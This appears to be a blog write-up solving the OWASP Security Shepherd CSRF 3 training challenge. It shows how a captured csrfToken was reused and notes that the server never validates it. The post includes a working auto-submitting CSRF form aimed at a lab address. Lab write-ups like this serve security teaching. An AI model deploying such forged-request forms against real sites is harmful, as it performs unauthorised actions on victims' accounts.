OWASP Security Shepherd Project - CSRF 3 (CSRF Challenge)
Challenge
Solution
This challenge is quite similar to challenge 2 except it requires another parameter which is csrfToken. As a result, the question will be how could we have a corresponding csrfToken?By capturing the HTTP request via BurpSuite, we know that our own csrfToken is -86594039104534445463367774171196943428.
Then, by checking the source code of this challenge webpage, it seems that the crsfToken is hard-coded in the form(at least for our current user) and they're all -86594039104534445463367774171196943428.
As a result, we could guess that the csrfToken never changes. This makes our form become the followings:
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengethree/plusplus" method="POST">
<input type="hidden" name="userid" value="637e8d2e65542fe82fe6da3b0356bc0865b0b791" />
<input type="hidden" name="csrfToken" value="-86594039104534445463367774171196943428"/>
<input type="submit"/>
</form>
<script> document.evilForm.submit(); </script>
Let's login as another user to see if we could have a correct CSRF attack!
Great! We pass the challenge! But... wait a minute. Let's check the source code of this user to see if the csrfToken really a hard-coded value.
Well, it is not... Now, we know that the csrfToken is not a fixed value, but it is not checked by the server : P That is so funny, so the csrfToken here is just a redundant parameter ~ WOW
留言
張貼留言
Welcome to share your comments or questions : -)
Enjoy life!